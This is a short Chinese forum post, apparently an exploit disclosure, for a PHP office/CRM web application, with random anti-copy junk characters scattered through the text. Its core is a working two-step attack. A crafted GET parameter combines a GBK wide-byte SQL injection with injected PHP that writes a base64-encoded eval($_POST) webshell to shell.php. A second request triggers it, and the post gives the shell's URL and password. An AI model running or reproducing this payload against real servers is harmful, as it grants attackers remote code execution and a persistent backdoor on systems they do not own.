此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
1 P; Y. f8 e4 u8 x4 L2 n5 L3 F) p' W; Y" a2 D; n) ] A
8 l) E8 j9 y9 w
EXP:: P" C4 h9 L5 I3 O9 _( ~
$ e* s( Z- A3 R$ r( ^第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}1 ^/ o. M! s1 r+ G) w
5 a) W% \0 T- [! X! T
第二步: [GET]http://site/general/email/index.php% K! u& A0 u2 @8 V
; c+ f5 E$ E9 ~0 z7 ^* B2 d3 }/ t8 M: G
SHELL: http://site/general/email/shell.php 密码C2 K+ W1 ~- b' }3 O, V
3 q& _" l" c2 B; |
& J$ g8 n! |5 z+ J# M9 P此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
8 U, Z# ~9 [# f2 V& _& P ) P, r; I3 s3 b
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~1 h( a: l) w$ s; A5 R2 P+ v6 N: L
, P% W. m, A$ G* Z1 v1 C k4 T
% N% i6 o1 Z5 ?/ G( o |